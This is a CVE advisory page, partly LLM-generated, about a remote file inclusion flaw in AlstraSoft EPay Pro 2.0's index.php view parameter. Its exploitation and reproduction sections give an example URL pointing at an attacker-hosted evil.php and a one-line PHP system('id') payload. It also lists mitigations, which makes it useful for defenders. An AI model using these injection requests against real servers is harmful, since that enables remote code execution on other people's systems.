CVE-2005-0980
Description
AlstraSoft EPay Pro 2.0 has a remote file inclusion vulnerability in index.php via the view parameter, allowing arbitrary code execution by an attacker.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
AlstraSoft EPay Pro 2.0 has a remote file inclusion vulnerability in index.php via the view parameter, allowing arbitrary code execution by an attacker.
Vulnerability
AlstraSoft EPay Pro version 2.0 contains a PHP remote file inclusion vulnerability in index.php. The view parameter is not properly sanitized, allowing an attacker to specify a URL on a remote web server that contains arbitrary PHP code. The application then includes and executes this code. This is described in the vendor's advisory [1].
Exploitation
An attacker can exploit this vulnerability by crafting a URL such as http://localhost/epal/index.php?view=http://www.server.com/evil where evil is a PHP file containing malicious code (e.g., a command execution script). No authentication is required; the attacker only needs to be able to send HTTP requests to the vulnerable server [1].
Impact
Successful exploitation allows the attacker to execute arbitrary PHP code on the target server, leading to full remote command execution. The attacker could then potentially compromise the server, execute commands, or access sensitive data, as the code runs with the privileges of the web server [1].
Mitigation
The advisory suggests using htmlspecialchars() for output functions and implementing a base directory restriction for file inclusion to prevent these vulnerabilities [1]. However, no official patch from AlstraSoft has been identified in the available references. Users should apply input validation and restrict include paths as a workaround. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2cpe:2.3:a:alstrasoft:epay:2.0:*:enterprise:*:*:*:*:*+ 1 more
- cpe:2.3:a:alstrasoft:epay:2.0:*:enterprise:*:*:*:*:*
- (no CPE)range: 2.0
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Unsanitized user input in the `view` parameter is passed directly to a PHP include statement, enabling remote file inclusion."
Attack vector
An attacker sends an HTTP request to `index.php` with the `view` parameter set to a URL pointing to a remote server hosting malicious PHP code. The application includes the remote file and executes its contents, allowing arbitrary command execution on the server [ref_id=1]. No authentication is required; the attacker only needs network access to the vulnerable application.
Affected code
The vulnerability exists in `index.php` of AlstraSoft EPay Pro 2.0. The `view` parameter is passed directly to a PHP include or require statement without any sanitization or base directory restriction [ref_id=1].
What the fix does
No patch is available in the bundle. The advisory recommends using a base directory for file includes and applying `htmlspecialchars()` to user-supplied input to prevent both the file inclusion and cross-site scripting issues [ref_id=1]. A proper fix would validate that the `view` parameter resolves to a file within an allowed directory and never accept remote URLs.
Preconditions
- networkThe attacker must be able to reach the vulnerable index.php endpoint over HTTP.
- inputThe attacker must host a PHP file on a remote server accessible from the target.
Reproduction
1. Host a PHP payload (e.g., `evil.php` containing `<? system('id'); ?>`) on a web server the target can reach. 2. Send a request to `http://[target]/epal/index.php?view=http://[attacker-server]/evil.php`. 3. The remote code executes on the target server [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- www.securityfocus.com/bid/12973nvdExploit
- secunia.com/advisories/14802nvdVendor Advisory
- marc.infonvd
News mentions
0No linked articles in our index yet.